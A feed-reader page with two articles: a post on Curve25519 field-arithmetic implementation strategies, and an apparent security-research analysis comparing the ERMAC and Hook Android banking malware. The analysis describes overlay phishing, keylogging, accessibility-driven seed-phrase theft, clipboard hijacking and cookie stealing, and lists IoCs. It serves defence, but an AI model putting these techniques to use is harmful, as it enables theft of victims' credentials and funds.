Reading view

There are new articles available, click to refresh the page.

On Multiplications with Unsaturated Limbs

This post is about a rather technical coding strategy choice that arises when implementing cryptographic algorithms on some elliptic curves, namely how to represent elements of the base field. We will be discussing Curve25519 implementations, in particular as part of Ed25519 signatures, as specified in RFC 8032. The most widely used Rust implementation of these operations is the curve25519-dalek library. My own research library is crrl, also written in plain Rust (no assembly); it is meant for research purposes, but I write it using all best practices for production-level implementations, e.g. it is fully constant-time and offers an API amenable to integration into various applications.

The following table measures performance of Ed25519 signature generation and verification with these libraries, using various backend implementations for operations in the base field (integers modulo 2255 – 19), on two test platforms (64-bit x86, and 64-bit RISC-V):

Implementationx86 (Intel “Coffee Lake”)RISC-V (SiFive U74)
LibraryBackendsignverifysignverify
crrlm6449130108559202021412764
m5170149148653158928304902
curve25519-daleksimd59553116243
serial59599169621180142449980
fiat70552198289187220429755
Ed25519 performance (in clock cycles), on x86 and RISC-V.

Test platforms are the following:

  • x86: an Intel Core i5-8259U CPU, running at 2.30 GHz (TurboBoost is disabled). This uses “Coffee Lake” cores (one of the late variants of the “Skylake” line). Operating system is Linux (Ubuntu 22.04), in 64-bit mode.
  • RISC-V: a StarFive VisionFive2 board with a StarFive JH7110 CPU, running at 1 GHz. The CPU contains four SiFive U74 cores and implements the I, M, C, Zba and Zbb architecture extensions (and some others which are not relevant here). Operating system is again Linux (Ubuntu 23.04), in 64-bit mode.

In both cases, the current Rust “stable” version is used (1.72.0, from 2023-08-23), and compilation uses the environment variable RUSTFLAGS=”-C target-cpu=native” to allow the compiler to use all opcodes supported by the current platform. The computation is performed over a single core, with measurements averaged over randomized inputs. The CPU cycle counter is used. Figures above are listed with many digits, but in practice there is a bit of natural variance due to varying inputs (signature verification is not constant-time, since it uses only public data) and, more generally, because of the effect of various operations also occurring within the CPU (e.g. management mode, cache usage from other cores, interruptions from hardware…), so that the measured values should be taken with a grain of salt (roughly speaking, differences below about 3% are not significant).

crrl and curve25519-dalek differ a bit in how they use internal tables to speed up computations; in general, crrl tables are smaller, and crrl performs fewer point additions but more point doublings. For signature verification, crrl implements the Antipa et al optimization with Lagrange’s algorithm for lattice basis reduction, but curve25519-dalek does not. The measurements above show that crrl’s strategy works (i.e. it is a tad faster than curve25519-dalek) (note: not listed above is the fact that curve25519-dalek supports batch signature verification with a substantially lower per-signature cost; crrl does not implement that feature yet). The point of this post is not to boast about how crrl is faster; its good performance should be taken as an indication that it is decently optimized and thus a correct illustration of the effect of its implementation strategy choices. Indeed, the interesting part is how the different backends compare to each other, on the two tested architectures.

curve25519-dalek has three backends:

  • serial: Field elements are split over 5 limbs of 51 bits; that is, value x is split into five values x0 to x4, such that x = x0 + 251x1 + 2102x2 + 2153x3 + 2204x4. Importantly, limb values are held in 64-bit words and may somewhat exceed 251 (within some limits, to avoid overflows during computations). The representation is redundant, in that a given field element x accepts many different representations; a normalization step is applied when necessary (e.g. when serializing curve points into bytes).
  • fiat: The fiat backend is a wrapper around the fiat-crypto library, which uses basically the same implementation strategy as the serial backend, but through automatic code generation that includes a correctness proof. In other words, the fiat backend is guaranteed through the magic of mathematics to always return the correct result, while in all other library backends listed here, the guarantee is “only” through the non-magic of code auditors (including myself) poring over the code for hours in search of issues, and not finding any (in practice all the code referenced here is believed correct).
  • simd: AVX2 opcodes are used to perform arithmetic operations on four field elements in parallel; each element is split over ten limbs of 25 and 26 bits each. curve25519-dalek selects that backend whenever possible, i.e. on x86 systems which have AVX2 (such as an Intel “Coffee Lake”), but of course it is not available on RISC-V.

crrl has two backends:

  • m51: A “51-bit limbs” backend similar to curve25519-dalek’s “serial”, though with somewhat different choices for the actual operations (this is detailed later on).
  • m64: Field elements are split over four 64-bit limbs, held in 64-bit types. By nature, such limbs cannot exceed their 64-bit range. The representation is still slightly redundant in that overall values may use the complete 256-bit range, so that each field element has two or three possible representations (a final reduction modulo 2255 – 19 is performed before serializing).

The “m64” backend could be deemed to be the most classical, in that such a representation would be what was preferred for big integer computations in, say, the 1990s. It minimizes the number of multiplication opcode invocations during a field element multiplication (with two 4-limb operands, 16 register multiplications are used), but also implies quite a lot of carry propagation. See for instance this excerpt of the implementation of field element multiplication in crrl’s m64 backend:

    let (e0, e1) = umull(a0, b0);
let (e2, e3) = umull(a1, b1);
let (e4, e5) = umull(a2, b2);
let (e6, e7) = umull(a3, b3);

let (lo, hi) = umull(a0, b1);
let (e1, cc) = addcarry_u64(e1, lo, 0);
let (e2, cc) = addcarry_u64(e2, hi, cc);
let (lo, hi) = umull(a0, b3);
let (e3, cc) = addcarry_u64(e3, lo, cc);
let (e4, cc) = addcarry_u64(e4, hi, cc);
let (lo, hi) = umull(a2, b3);
let (e5, cc) = addcarry_u64(e5, lo, cc);
let (e6, cc) = addcarry_u64(e6, hi, cc);
let (e7, _) = addcarry_u64(e7, 0, cc);

let (lo, hi) = umull(a1, b0);
let (e1, cc) = addcarry_u64(e1, lo, 0);
let (e2, cc) = addcarry_u64(e2, hi, cc);
let (lo, hi) = umull(a3, b0);
let (e3, cc) = addcarry_u64(e3, lo, cc);
let (e4, cc) = addcarry_u64(e4, hi, cc);
let (lo, hi) = umull(a3, b2);
let (e5, cc) = addcarry_u64(e5, lo, cc);
let (e6, cc) = addcarry_u64(e6, hi, cc);
let (e7, _) = addcarry_u64(e7, 0, cc);

The addcarry_u64() calls above implement the “add with carry” operation, which, on x86, map to the ADC opcode (or, on that core, the ADCX or ADOX opcodes).

When Ed25519 signatures were invented, in 2011, the Intel CPUs du jour (Intel “Westmere” core) were not very good at carry propagation; they certainly supported the ADC opcode, but with a relatively high latency (2 cycles), and that made the classical code somewhat slow. The use of 51-bit limbs allowed a different code, which, in curve25519-dalek’s serial backend, looks like this:

    let b1_19 = b[1] * 19;
let b2_19 = b[2] * 19;
let b3_19 = b[3] * 19;
let b4_19 = b[4] * 19;

// Multiply to get 128-bit coefficients of output
let c0: u128 = m(a[0], b[0]) + m(a[4], b1_19) + m(a[3], b2_19) + m(a[2], b3_19) + m(a[1], b4_19);
let mut c1: u128 = m(a[1], b[0]) + m(a[0], b[1]) + m(a[4], b2_19) + m(a[3], b3_19) + m(a[2], b4_19);
let mut c2: u128 = m(a[2], b[0]) + m(a[1], b[1]) + m(a[0], b[2]) + m(a[4], b3_19) + m(a[3], b4_19);
let mut c3: u128 = m(a[3], b[0]) + m(a[2], b[1]) + m(a[1], b[2]) + m(a[0], b[3]) + m(a[4], b4_19);
let mut c4: u128 = m(a[4], b[0]) + m(a[3], b[1]) + m(a[2], b[2]) + m(a[1], b[3]) + m(a[0] , b[4]);

This code excerpt computes the result over five limbs which can now range over close to 128 bits, and some extra high part propagation (not shown above) is needed to shrink limbs down to 51 bits or so. As we see here, there are now 25 individual multiplications (the m() function), since there are five limbs per input. There still are ADC opcodes in there! They are somewhat hidden behind the additions: these additions are over Rust’s u128 type, a 128-bit integer type that internally uses two registers, so that each addition implies one ADC opcode. However, these carry propagations can occur mostly in parallel (there are five independent dependency chains here), and that maps well to the abilities of a Westmere core. On such cores, the “serial” backend is faster than crrl’s m64. However, in later x86 CPUs from Intel (starting with the Haswell core), support for add-with-carry opcodes was substantially improved, and the classical method with 64-bit limbs again gained the upper hand. This was already noticed by Nath and Sarkar in 2018 and this explains why crrl’s m64 backend, on our x86 test system, is faster than curve25519-dalek’s serial and fiat backends, and even a bit faster than the AVX2-powered simd backend.

RISC-V

Now enters the RISC-V platform. RISC-V is an open architecture which has been designed with what can be viewed as “pure RISC philosophy”, with a much reduced instruction set. It is inspired from the older DEC Alpha, including in particular a large number of integer registers (32), one of which being fixed to the value zero, and, most notably, no carry flag at all. An “add-with-carry” operation, which adds together two 64-bit inputs x and y and an input carry c, and outputs a 64-bit result z and an output carry d, now requires no fewer than five instructions:

  1. Add x and y, into z (ADD).
  2. Compare z to x (SLTU): if z is strictly lower, then the addition “wrapped around”; the comparison output (0 or 1) is written into d.
  3. Add c to z (ADD).
  4. Compare z to c (SLTU) for another potential “wrap around”, with a 0 or 1 value written into another register t.
  5. Add t to d (ADD).

(I cannot prove that it is not doable in fewer RISC-V instructions; if there is a better solution please tell me.)

Thus, the add-with-carry is not only a high-latency sequence, but it also requires quite a few instructions, and instruction throughput may be a bottleneck. Out test platform (SiFive U74 core) is not well documented, but some cursory tests show the following:

  • Multiplication opcodes have a throughput of one per cycle, and a latency of three cycles (this seems constant-time). As per the RISC-V specification (“M” extension), a 64×64 multiplication with a 128-bit result requires two separate opcodes (MUL returns the low 64 bits of the result, MULHU returns the high 64 bits). There is a recommended code sequence for when the two opcodes relate to the same operands, but this does not appear to be leveraged by this particular CPU.
  • For “simple” operations such as ADD or SLTU, the CPU may schedule up to two instructions in the same cycle, but the exact conditions for this to happen are unclear, and each instruction still has a 1-cycle latency.

Under such conditions, a 5-instruction add-with-carry will need a minimum of 2.5 cycles (in terms of throughput). The main output (z) is available with a latency of 2 cycles, but the output carry has a latency of 4 cycles. A “partial” add-with-carry with no input carry is cheaper (an ADD and a SLTU), and so is an add-with-carry with no output carry (two ADDs), but these are still relatively expensive. The high latency is similar to the Westmere situation, but the throughput cost is new. For that RISC-V platform, we need to avoid not only long dependency chains of carry propagation, but we should also endeavour to do fewer carry propagations. Another operation which is similarly expensive is the split of a 115-bit value (held in a 128-bit variable) into a low (51 bits) and high (64 bits) parts. The straightforward Rust code looks like this (from curve25519-dalek):

    let carry: u64 = (c4 >> 51) as u64;
out[4] = (c4 as u64) & LOW_51_BIT_MASK;

On x86, the 128-bit value is held in two registers; the low part is a simple bitwise AND with a constant, and the high part is extracted with a single SHLD opcode, that can extract a chunk out of the concatenation of two input registers. On RISC-V, there is no shift opcode with two input registers (not counting the shift count); instead, the extraction of the high part (called carry in the code excerpt above) requires three instructions: two single-register shifts (SHR, SHL) and one bitwise OR to combine the results.

In order to yield better performance on RISC-V, the crrl m51 backend does things a bit differently:

    let a0 = a0 << 6;
let b0 = b0 << 7;
// ...
let (c00, h00) = umull(a0, b0);
let d0 = c00 >> 13;

Here, the input limbs are pre-shifted (by 6 or 7 bits) so that the products are shifted by 13 bits. In that case, the boundary between the low and high parts falls exactly on the boundary between the two registers that receive the multiplication result; the extraction of the high part becomes free! The low part is obtained with a single opcode (a right shift of the low register by 13 bits). Moreover, instead of performing 128-bit additions, crrl’s m51 code adds the low and high parts separately:

    let d0 = c00 >> 13;
let d1 = (c01 >> 13)
+ (c10 >> 13);
let d2 = (c02 >> 13)
+ (c11 >> 13)
+ (c20 >> 13);
// ...
let h0 = h00;
let h1 = h01 + h10;
let h2 = h02 + h11 + h20;

In that way, all add-with-carry operations are avoided. This makes crrl’s m51 code somewhat slower than curve2519-dalek’s serial backend on x86, but it quite improves the performance on RISC-V.

Conclusion

The discussion above is about a fairly technical point. In the grand scheme of things, the differences in performance between the various implementation strategies is not great; there are not many usage contexts where a speed difference of less than 30% in computing or verifying Ed25519 signatures has any relevance to overall application performance. But, insofar as such things matter, the following points are to be remembered:

  • Modern large CPUs (for laptops and servers) are good at handling add-with-carry, and for them the classical “64-bit limbs” format tends to be the fastest.
  • Some smaller CPUs will be happier with 51-bit limbs. However, there is no one-size-fits-all implementation strategy: for some CPUs, the main issue is the latency of add-with-carry, while for some others, in particular RISC-V systems, the instruction throughput is the bottleneck.

From ERMAC to Hook: Investigating the technical differences between two Android malware variants

Authored by Joshua Kamp (main author) and Alberto Segura.

Summary

Hook and ERMAC are Android based malware families that are both advertised by the actor named “DukeEugene”. Hook is the latest variant to be released by this actor and was first announced at the start of 2023. In this announcement, the actor claims that Hook was written from scratch [1]. In our research, we have analysed two samples of Hook and two samples of ERMAC to further examine the technical differences between these malware families.

After our investigation, we concluded that the ERMAC source code was used as a base for Hook. All commands (30 in total) that the malware operator can send to a device infected with ERMAC malware, also exist in Hook. The code implementation for these commands is nearly identical. The main features in ERMAC are related to sending SMS messages, displaying a phishing window on top of a legitimate app, extracting a list of installed applications, SMS messages and accounts, and automated stealing of recovery seed phrases for multiple cryptocurrency wallets.

Hook has introduced a lot of new features, with a total of 38 additional commands when comparing the latest version of Hook to ERMAC. The most interesting new features in Hook are: streaming the victim’s screen and interacting with the interface to gain complete control over an infected device, the ability to take a photo of the victim using their front facing camera, stealing of cookies related to Google login sessions, and the added support for stealing recovery seeds from additional cryptocurrency wallets.

Hook had a relatively short run. It was first announced on the 12th of January 2023, and the closing of the project was announced on April 19th, 2023, due to “leaving for special military operation”. On May 11th, 2023, the actors claimed that the source code of Hook was sold at a price of $70.000. If these announcements are true, it could mean that we will see interesting new versions of Hook in the future.

The launch of Hook

On the 12th of January 2023, DukeEugene started advertising a new Android botnet to be available for rent: Hook.

Forum post where DukeEugene first advertised Hook.

Hook malware is designed to steal personal information from its infected users. It contains features such as keylogging, injections/overlay attacks to display phishing windows over (banking) apps (more on this in the “Overlay attacks” section of this blog), and automated stealing of cryptocurrency recovery seeds.

Financial gain seems to be the main motivator for operators that rent Hook, but the malware can be used to spy on its victims as well. Hook is rented out at a cost of $7.000 per month.

Forum post showing the rental price of Hook, along with the claim that it was written from scratch.

The malware was advertised with a wide range of functionality in both the control panel and build itself, and a snippet of this can be seen in the screenshot below.

Some of Hook’s features that were advertised by DukeEugene.

Command comparison

Analyst’s note: The package names and file hashes that were analysed for this research can be found in the “Analysed samples” section at the end of this blog post.

While checking out the differences in these malware families, we compared the C2 commands (instructions that are sent by the malware operator to the infected device) in each sample. This analysis did lead us to find several new commands and features on Hook, as can be seen just looking at the number of commands implemented in each variant.

SampleNumber of commands
Hook sample #158
Hook sample #268
Ermac sample #1 #230

All 30 commands that exist in ERMAC also exist in Hook. Most of these commands are related to sending SMS messages, updating and starting injections, extracting a list of installed applications, SMS messages and accounts, and starting another app on the victim’s device (where cryptocurrency wallet apps are the main target). While simply launching another app may not seem that malicious at first, you will think differently after learning about the automated features in these malware families.

Automated features in the Hook C2 panel.

Both Hook and ERMAC contain automated functionality for stealing recovery seeds from cryptocurrency wallets. These can be used to gain access to the victim’s cryptocurrency. We will dive deeper into this feature later in the blog.

When comparing Hook to ERMAC, 29 new commands have been added to the first sample of Hook that we analysed, and the latest version of Hook contains 9 additional commands on top of that. Most of the commands that were added in Hook are related to interacting with the user interface (UI).

Hook command: start_vnc

The UI interaction related commands (such as “clickat” to click on a specific UI element and “longpress” to dispatch a long press gesture) in Hook go hand in hand with the new “start_vnc” command, which starts streaming the victim’s screen.

A decompiled method that is called after the “start_vnc” command is received by the bot.

In the code snippet above we can see that the createScreenCaptureIntent() method is called on the MediaProjectionManager, which is necessary to start screen capture on the device. Along with the many commands to interact with the UI, this allows the malware operator to gain complete control over an infected device and perform actions on the victim’s behalf.


Controls for the malware operator related to the “start_vnc” command.

Command implementation

For the commands that are available in both ERMAC and Hook, the code implementation is nearly identical. Take the “logaccounts” command for example:

Decompiled code that is related to the “logaccounts” command in ERMAC and Hook.

This command is used to obtain a list of available accounts by their name and type on the victim’s device. When comparing the code, it’s clear that the logging messages are the main difference. This is the case for all commands that are present in both ERMAC and Hook.

Russian commands

Both ERMAC and the Hook v1 sample that we analysed contain some rather edgy commands in Russian, that do not provide any useful functionality.

Decompiled code which contains Russian text in ERMAC and first versions of Hook.

The command above translates to “Die_he_who_reversed_this“.

All the Russian commands create a file named “system.apk” in the “apk” directory and immediately deletes it. It appears that the authors have recently adapted their approach to managing a reputable business, as these commands were removed in the latest Hook sample that we analysed.

New commands in Hook V2

In the latest versions of Hook, the authors have added 9 additional commands compared to the first Hook sample that we analysed. These commands are:

CommandDescription
send_sms_manySends an SMS message to multiple phone numbers
addwaitviewDisplays a “wait / loading” view with a progress bar, custom background colour, text colour, and text to be displayed
removewaitviewRemoves the “wait / loading” view that is displayed on the victim’s device because of the “addwaitview” command
addviewAdds a new view with a black background that covers the entire screen
removeviewRemoves the view with the black background that was added by the “addview” command
cookieSteals session cookies (targets victim’s Google account)
safepalStarts the Safepal Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service)
exodusStarts the Exodus Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service)
takephotoTakes a photo of the victim using the front facing camera

One of the already existing commands, “onkeyevent”, also received a new payload option: “double_tap”. As the name suggests, this performs a double tap gesture on the victim’s screen, providing the malware operator with extra functionality to interact with the victim’s device user interface.

More interesting additions are: the support for stealing recovery seed phrases from other crypto wallets (Safepal and Exodus), taking a photo of the victim, and stealing session cookies. Session cookie stealing appears to be a popular trend in Android malware, as we have observed this feature being added to multiple malware families. This is an attractive feature, as it allows the actor to gain access to user accounts without needing the actual login credentials.

Device Admin abuse

Besides adding new commands, the authors have added more functionality related to the “Device Administration API” in the latest version of Hook. This API was developed to support enterprise apps in Android. When an app has device admin privileges, it gains additional capabilities meant for managing the device. This includes the ability to enforce password policies, locking the screen and even wiping the device remotely. As you may expect: abuse of these privileges is often seen in Android malware.

DeviceAdminReceiver and policies

To implement custom device admin functionality in a new class, it should extend the “DeviceAdminReceiver”. This class can be found by examining the app’s Manifest file and searching for the receiver with the “BIND_DEVICE_ADMIN” permission or the “DEVICE_ADMIN_ENABLED” action.

Defined device admin receiver in the Manifest file of Hook 2.

In the screenshot above, you can see an XML file declared as follows: android:resource=”@xml/buyanigetili. This file will contain the device admin policies that can be used by the app. Here’s a comparison of the device admin policies in ERMAC, Hook 1, and Hook 2:

Differences between device admin policies in ERMAC and Hook.

Comparing Hook to ERMAC, the authors have removed the “WIPE_DATA” policy and added the “RESET_PASSWORD” policy in the first version of Hook. In the latest version of Hook, the “DISABLE_KEYGUARD_FEATURES” and “WATCH_LOGIN” policies were added. Below you’ll find a description of each policy that is seen in the screenshot.

Device Admin PolicyDescription
USES_POLICY_FORCE_LOCKThe app can lock the device
USES_POLICY_WIPE_DATAThe app can factory reset the device
USES_POLICY_RESET_PASSWORDThe app can reset the device’s password/pin code
USES_POLICY_DISABLE_KEYGUARD_FEATURESThe app can disable use of keyguard (lock screen) features, such as the fingerprint scanner
USES_POLICY_WATCH_LOGINThe app can watch login attempts from the user

The “DeviceAdminReceiver” class in Android contains methods that can be overridden. This is done to customise the behaviour of a device admin receiver. For example: the “onPasswordFailed” method in the DeviceAdminReceiver is called when an incorrect password is entered on the device. This method can be overridden to perform specific actions when a failed login attempt occurs. In ERMAC and Hook 1, the class that extends the DeviceAdminReceiver only overrides the onReceive() method and the implementation is minimal:


Full implementation of the class to extend the DeviceAdminReceiver in ERMAC. The first version of Hook contains the same implementation.

The onReceive() method is the entry point for broadcasts that are intercepted by the device admin receiver. In ERMAC and Hook 1 this only performs a check to see whether the received parameters are null and will throw an exception if they are.

DeviceAdminReceiver additions in latest version of Hook

In the latest edition of Hook, the class to extend the DeviceAdminReceiver does not just override the “onReceive” method. It also overrides the following methods:

Device Admin MethodDescription
onDisableRequested()Called when the user attempts to disable device admin. Gives the developer a chance to present a warning message to the user
onDisabled()Called prior to device admin being disabled. Upon return, the app can no longer use the protected parts of the DevicePolicyManager API
onEnabled()Called after device admin is first enabled. At this point, the app can use “DevicePolicyManager” to set the desired policies
onPasswordFailed()Called when the user has entered an incorrect password for the device
onPasswordSucceeded()Called after the user has entered a correct password for the device

When the victim attempts to disable device admin, a warning message is displayed that contains the text “Your mobile is die”.

Decompiled code that shows the implementation of the “onDisableRequested” method in the latest version of Hook.

The fingerprint scanner will be disabled when an incorrect password was entered on the victim’s device. Possibly to make it easier to break into the device later, by forcing the victim to enter their PIN and capturing it.

Decompiled code that shows the implementation of the “onPasswordFailed” method in the latest version of Hook.

All keyguard (lock screen) features are enabled again when a correct password was entered on the victim’s device.

Decompiled code that shows the implementation of the “onPasswordSucceeded” method in the latest version of Hook.

Overlay attacks

Overlay attacks, also known as injections, are a popular tactic to steal credentials on Android devices. When an app has permission to draw overlays, it can display content on top of other apps that are running on the device. This is interesting for threat actors, because it allows them to display a phishing window over a legitimate app. When the victim enters their credentials in this window, the malware will capture them.

Both ERMAC and Hook use web injections to display a phishing window as soon as it detects a targeted app being launched on the victim’s device.

Decompiled code that shows partial implementation of overlay injections in ERMAC and Hook.

In the screenshot above, you can see how ERMAC and Hook set up a WebView component and load the HTML code to be displayed over the target app by calling webView5.loadDataWithBaseURL(null, s6, “text/html”, “UTF-8”, null) and this.setContentView() on the WebView object. The “s6” variable will contain the data to be loaded. The main functionality is the same for both variants, with Hook having some additional logging messages.

The importance of accessibility services

Accessibility Service abuse plays an important role when it comes to web injections and other automated feature in ERMAC and Hook. Accessibility services are used to assist users with disabilities, or users who may temporarily be unable to fully interact with their Android device. For example: users that are driving might need additional or alternative interface feedback. Accessibility services run in the background and receive callbacks from the system when AccessibilityEvent is fired. Apps with accessibility service can have full visibility over UI events, both from the system and from 3rd party apps. They can receive notifications, they can get the package name, list UI elements, extract text, and more. While these services are meant to assist users, they can also be abused by malicious apps for activities such as: keylogging, automatically granting itself additional permissions, and monitoring foreground apps and overlaying them with phishing windows.

When ERMAC or Hook malware is first launched, it prompts the victim with a window that instructs them to enable accessibility services for the malicious app.

Instruction window to enable the accessibility service, which is shown upon first execution of ERMAC and Hook malware.

A warning message is displayed before enabling the accessibility service, which shows what actions the app will be able to perform when this is enabled.

Warning message that is displayed before enabling accessibility services.

With accessibility services enabled, ERMAC and Hook malware automatically grants itself additional permissions such as permission to draw overlays. The onAccessibilityEvent() method monitors the package names from received accessibility events, and the web injection related code will be executed when a target app is launched.

Targeted applications

When the infected device is ready to communicate with the C2 server, it sends a list of applications that are currently installed on the device. The C2 server then responds with the target apps that it has injections for. While dynamically analysing the latest version of Hook, we sent a custom HTTP request to the C2 server to make it believe that we have a large amount of apps (700+) installed. For this, we used the list of package names that CSIRT KNF had shared in an analysis report of Hook [2].

Part of our manually crafted HTTP request that includes a list of “installed apps” for our infected device.

The server responded with the list of target apps that the malware can display phishing windows for. Most of the targeted apps in both Hook and ERMAC are related to banking.

Part of the C2 server response that contains the target apps for overlay injections.

Keylogging

Keylogging functionality can be found in the onAccessibilityEvent() method of both ERMAC and Hook. For every accessibility event type that is triggered on the infected device, a method is called that contains keylogger functionality. This method then checks what the accessibility event type was to label the log and extracts the text from it. Comparing the code implementation of keylogging in ERMAC to Hook, there are some slight differences in the accessibility event types that it checks for. But the main functionality of extracting text and sending it to the C2 with a certain label is the same.

Decompiled code snippet of keylogging in ERMAC and in Hook.

The ERMAC keylogger contains an extra check for accessibility event “TYPE_VIEW_SELECTED” (triggered when a user selects a view, such as tapping on a button). Accessibility services can extract information about a selected view, such as the text, and that is exactly what is happening here.

Hook specifically checks for two other accessibility events: the “TYPE_WINDOW_STATE_CHANGED” event (triggered when the state of an active window changes, for example when a new window is opened) or the “TYPE_WINDOW_CONTENT_CHANGED” event (triggered when the content within a window changes, like when the text within a window is updated).

It checks for these events in combination with the content change type

“CONTENT_CHANGE_TYPE_TEXT” (indicating that the text of an UI element has changed). This tells us that the accessibility service is interested in changes of the textual content within a window, which is not surprising for a keylogger.

Stealing of crypto wallet seed phrases

Automatic stealing of recovery seeds from crypto wallets is one of the main features in ERMAC and Hook. This feature is actively developed, with support added for extra crypto wallets in the latest version of Hook.

For this feature, the accessibility service first checks if a crypto wallet app has been opened. Then, it will find UI elements by their ID (such as “com.wallet.crypto.trustapp:id/wallets_preference” and “com.wallet.crypto.trustapp:id/item_wallet_info_action”) and automatically clicks on these elements until it navigated to the view that contains the recovery seed phrase. For the crypto wallet app, it will look like the user is browsing to this phrase by themselves.

Decompiled code that shows ERMAC and Hook searching for and clicking on UI elements in the Trust Wallet app.

Once the window with the recovery seed phrase is reached, it will extract the words from the recovery seed phrase and send them to the C2 server.

Decompiled code that shows the actions in ERMAC and Hook after obtaining the seed phrase.

The main implementation is the same in ERMAC and Hook for this feature, with Hook containing some extra logging messages and support for stealing seed phrases from additional cryptocurrency wallets.

Replacing copied crypto wallet addresses

Besides being able to automatically steal recovery seeds from opened crypto wallet apps, ERMAC and Hook can also detect whether a wallet address has been copied and replaces the clipboard with their own wallet address. It does this by monitoring for the “TYPE_VIEW_TEXT_CHANGED” event, and checking whether the text matches a regular expression for Bitcoin and Ethereum wallet addresses. If it matches, it will replace the clipboard text with the wallet address of the threat actor.

Decompiled code that shows how ERMAC and Hook replace copied crypto wallet addresses.

The wallet addresses that the actors use in both ERMAC and Hook are bc1ql34xd8ynty3myfkwaf8jqeth0p4fxkxg673vlf for Bitcoin and 0x3Cf7d4A8D30035Af83058371f0C6D4369B5024Ca for Ethereum. It’s worth mentioning that these wallet addresses are the same in all samples that we analysed. It appears that this feature has not been very successful for the actors, as they have received only two transactions at the time of writing.

Transactions received by the Ethereum wallet address of the actors.

Since the feature has been so unsuccessful, we assume that both received transactions were initiated by the actors themselves. The latest transaction was received from a verified Binance exchange wallet, and it’s unlikely that this comes from an infected device. The other transaction comes from a wallet that could be owned by the Hook actors.

Stealing of session cookies

The “cookie” command is exclusive to Hook and was only added in the latest version of this malware. This feature allows the malware operator to steal session cookies in order to take over the victim’s login session. To do so, a new WebViewClient is set up. When the victim has logged onto their account, the onPageFinished() method of the WebView will be called and it sends the stolen cookies to the C2 server.

Decompiled code that shows Google account session cookies will be sent to the C2 server.

All cookie stealing code is related to Google accounts. This is in line with DukeEugene’s announcement of new features that were posted about on April 1st, 2023. See #12 in the screenshot below.

DukeEugene announced new features in Hook, showing the main objective for the “cookie” command.

C2 communication protocol

HTTP in ERMAC

ERMAC is known to use the HTTP protocol for communicating with the C2 server, where data is encrypted using AES-256-CBC and then Base64 encoded. The bot sends HTTP POST requests to a randomly generated URL that ends with “.php/” (note that the IP of the C2 server remains the same).

Decompiled code that shows how request URLs are built in ERMAC.
Example HTTP POST request that was made during dynamic analysis of ERMAC.

WebSockets in Hook

The first editions of Hook introduced WebSocket communication using Socket.IO, and data is encrypted using the same mechanism as in ERMAC. The Socket.IO library is built on top of the WebSocket protocol and offers low-latency, bidirectional and event-based communication between a client and a server. Socket.IO provides additional guarantees such as fallback to the HTTP protocol and automatic reconnection [3].

Screenshot of WebSocket communication using Socket.IO in Hook.

The screenshot above shows that the login command was issued to the server, with the user ID of the infected device being sent as encrypted data. The “42” at the beginning of the message is standard in Socket.IO, where the “4” stands for the Engine.IO “message” packet type and the “2” for Socket.IO’s “message” packet type [3].

Mix and match – Protocols in latest versions of Hook

The latest Hook version that we’ve analysed contains the ERMAC HTTP protocol implementation, as well as the WebSocket implementation which already existed in previous editions of Hook. The Hook code snippet below shows that it uses the exact same code implementation as observed in ERMAC to build the URLs for HTTP requests.

Decompiled code that shows the latest version of Hook implemented the same logic for building URLs as ERMAC.

Both Hook and ERMAC use the “checkAP” command to check for commands sent by the C2 server. In the screenshot below, you can see that the malware operator sent the “killme” command to the infected device to uninstall Hook. This shows that the ERMAC HTTP protocol is actively used in the latest versions of Hook, together with the already existing WebSocket implementation.

The infected device is checking for commands sent by the C2 in Hook.

C2 servers

During our investigation into the technical differences between Hook and ERMAC, we have also collected C2 servers related to both families. From these servers, Russia is clearly the preferred country for hosting Hook and ERMAC C2s. We have identified a total of 23 Hook C2 servers that are hosted in Russia.

Other countries that we have found ERMAC and Hook are hosted in are:

  • The Netherlands
  • United Kingdom
  • United States
  • Germany
  • France
  • Korea
  • Japan
Popular countries for hosting Hook and ERMAC C2 servers.

The end?

On the 19th of April 2023, DukeEugene announced that they are closing the Hook project due to leaving for “special military operation”. The actor mentions that the coder of the Hook project, who goes by the nickname “RedDragon”, will continue to support their clients until their lease runs out.

DukeEugene mentions that they are closing the Hook project. Note that the first post was created on 19 April 2023 initially and edited a day later.

Two days prior to this announcement, the coder of Hook created a post stating that the source code of Hook is for sale at a price of $70.000. Nearly a month later, on May 11th, the coder asked if the thread could be closed as the source code was sold.

Hook’s coder announcing that the source code is for sale.

Observations

In the “Replacing copied crypto wallet addresses” section of this blog, we mentioned that the first received transaction comes from an Ethereum wallet address that could possibly be owned by the Hook actors. We noticed that this wallet received a transaction of roughly $25.000 the day after Hook was announced sold. This could be a coincidence, but the fact that this wallet was also the first to send (a small amount of) money to the Ethereum address that is hardcoded in Hook and ERMAC makes us suspect this.

Ethereum transaction that could be related to Hook.

We can’t verify whether the messages from DukeEugene and RedDragon are true. But if they are, we expect to see interesting new forks of Hook in the future.

In this blog we’ve debunked DukeEugene’s statement of Hook being fully developed from scratch. Additionally, in DukeEugene’s advertisement of HookBot we see a screenshot of the Hook panel that seemed to show similarities with ERMAC’s panel.

Conclusion

While the actors of Hook had announced that the malware was written from scratch, it is clear that the ERMAC source code was used as a base. All commands that are present in ERMAC also exist in Hook, and the code implementation of these commands is nearly identical in both malware families. Both Hook and ERMAC contain typical features to steal credentials which are common in Android malware, such as overlay attacks/injections and keylogging. Perhaps a more interesting feature that exists in both malware families is the automated stealing of recovery seeds from cryptocurrency wallets.

While Hook was not written completely from scratch, the authors have added interesting new features compared to ERMAC. With the added capability of being able to stream the victim’s screen and interacting with the UI, operators of Hook can gain complete control over infected devices and perform actions on the user’s behalf. Other interesting new features include the ability to take a photo of the victim using their front facing camera, stealing of cookies related to Google login sessions, and the added support for stealing recovery seeds from additional cryptocurrency wallets.

Besides these new features, significant changes were made in the protocol for communicating with the C2 server. The first versions of Hook introduced WebSocket communication using the Socket.IO library. The latest version of Hook added the HTTP protocol implementation that was already present in ERMAC and can use this next to WebSocket communication.

Hook had a relatively short run. It was first announced on the 12th of January 2023, and the closing of the project was announced on April 19th, 2023, with the actor claiming that he is leaving for “special military operation”. The coder of Hook has allegedly put the source code up for sale at a price of $70,000 and stated that it was sold on May 11th, 2023. If these announcements are true, it could mean that we will see interesting new forks of Hook in the future.

Indicators of Compromise

Analysed samples

FamilyPackage nameFile hash (SHA-256)
Hookcom.lojibiwawajinu.gunac5996e7a701f1154b48f962d01d457f9b7e95d9c3dd9bbd6a8e083865d563622
